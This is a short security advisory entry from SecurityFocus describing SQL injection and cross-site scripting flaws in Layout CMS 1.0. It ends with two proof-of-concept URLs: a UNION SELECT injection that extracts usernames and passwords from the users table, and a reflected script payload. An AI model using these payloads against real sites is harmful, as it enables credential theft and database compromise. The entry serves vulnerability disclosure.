10 lines
No EOL
700 B
Text
Executable file
10 lines
No EOL
700 B
Text
Executable file
source: http://www.securityfocus.com/bid/40415/info
|
|
|
|
Layout CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
|
|
|
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
Layout CMS 1.0 is vulnerable; other versions may be affected.
|
|
|
|
http://www.example.com/preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users
|
|
http://www.example.com/preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E |